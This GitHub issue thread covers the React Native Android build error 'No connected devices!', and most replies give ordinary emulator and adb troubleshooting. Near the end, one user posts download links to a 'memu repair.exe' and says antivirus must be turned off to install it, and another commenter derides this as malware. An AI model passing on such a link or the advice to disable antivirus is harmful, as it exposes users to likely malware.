### ISSUE TITLE
Failed run android simulator : No connected devices!

### ISSUE THREAD

**Issue by nvcken** [facebook/react-native#3091]
I try to run app on android simulator but failed
```
:app:installDebug FAILED

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':app:installDebug'.
> com.android.builder.testing.api.DeviceException: No connected devices!

```

**Comment by satya164** [comment]
What does `adb devices ` print? If debugging mode turned on in your phone?

**Comment by nvcken** [comment]
I have not plug real phone for running app.
I want to run app on "virtual android" simulator as like as xcode emulator

**Comment by ide** [comment]
Launch the simulator and try running again.

**Comment by nvcken** [comment]
It works.
Thanks all

**Comment by mgenev** [comment]
@ide how to launch the simulator on its own? Cordova has always launched it for me so far

**Comment by ide** [comment]
@mgenev https://developer.android.com/tools/building/building-cmdline.html#RunningOnEmulator

**Comment by TheNotary** [comment]
If you don't have any devices listed from `adb devices` You'll want to start by creating an android image.  
```
$  android create avd -n <name> -t <target> --abi default/x86_64
```
`<name>` can be anything, like react, `<target>` should be one of the options produced by the command `android list targets`.  If *that* listing is empty, use the `android` GUI to install a target platform and such.  

See:  http://stackoverflow.com/questions/4974568/how-do-i-launch-the-android-emulator-from-the-command-line

**Comment by emanuti** [comment]
In my case, It was on my device. 
http://facebook.github.io/react-native/releases/0.23/docs/android-setup.html#troubleshooting
On Terminal, I made step 1 and after run react-native start at root directory and then on other table run react-native run-android.

**Comment by ltfschoen** [comment]
Further to @TheNotary comment. The alternative to creating your Android Virtual Device (AVD) from the command line is (i.e. instead of `android create ...`) you can instead just open the Android Virtual Device (AVD) Manager GUI with `android avd`, where you can easily create the AVDs and associated properties.

**Comment by francisrod01** [comment]
In my case, I have my device connected but it was impossible install the app in it.

```
:app:assembleDebug UP-TO-DATE
:app:installDebug FAILED

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':app:installDebug'.
> com.android.builder.testing.api.DeviceException: No connected devices!

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output.

BUILD FAILED

Total time: 36.151 secs
Could not install the app on the device, read the error above for details.
Make sure you have an Android emulator running or a device connected and have
set up your Android development environment:
https://facebook.github.io/react-native/docs/android-setup.html
paneladm@debian:~/projects/react-native-apps/AwesomeProject$ 
paneladm@debian:~/projects/react-native-apps/AwesomeProject$ 
paneladm@debian:~/projects/react-native-apps/AwesomeProject$ 

paneladm@debian:~/projects/react-native-apps/AwesomeProject$ adb devices
List of devices attached 
T099703ZXQ	device

paneladm@debian:~/projects/react-native-apps/AwesomeProject$ 

```

**Comment by lucascrezende** [comment]
So, basically all the time I want to `react-native run-android` I first have to go to `../Library/Android/sdk/tools` and run `emulator -avd <avd_name>`, wait until the emulator loads and then run `react-native run-android`?

**Comment by francisrod01** [comment]
@nvcken I think that you have the same problem with two adb in your machine.

Please remove `android-tools-adb` because is outdated and appoint `/usr/bin/adb` to adb from Android SDK and try it again. ;)

See more about how I solved that in this issue https://github.com/luggit/react-native-config/issues/202

**Comment by hasibsahibzada** [comment]
This normally due to mis-match of the running emulator API version with the configured version in your android configuration file (android/app/build.gradle). 
what ever API version you set to ``` compileSdkVersion```, should match the running emulator API version.

**Comment by dann1609** [comment]
close all simulators and run it again.

**Comment by markhu** [comment]
FWIW, some of the above advice is out-dated...

```
$ android list target
*************************************************************************
The "android" command is deprecated.
For manual SDK, AVD, and project management, please use Android Studio.
For command-line tools, use tools/bin/sdkmanager and tools/bin/avdmanager
*************************************************************************
Running /usr/lib/android-sdk/tools/bin/avdmanager list target
```

**Comment by alidoran** [comment]
by this file memu adb and memu ide and memu connect problem solved

https://drive.google.com/open?id=1w0Qua8-wLZcKMln6fjMo4Qj8_fW3Yq3O

**Comment by TheNotary** [comment]
The image upload didn't work and only made a malware link :/

**Comment by alidoran** [comment]
memu repair
<http://cdn.persiangig.com/download/e8HZsJdyji/memu%20repair.exe/dl>

**Comment by alidoran** [comment]
i repair link
this file edit memu and need to turn off antivirus 3 second for install

**Comment by TheNotary** [comment]
Ok, I got the mailware to download correctly, but now it says:

```
This malware requires Windows 7 and above to work.  
```

What should I do if I'm on a real operating system like Debian?

**Comment by alidoran** [comment]
im sorry
my program dont work on linux base
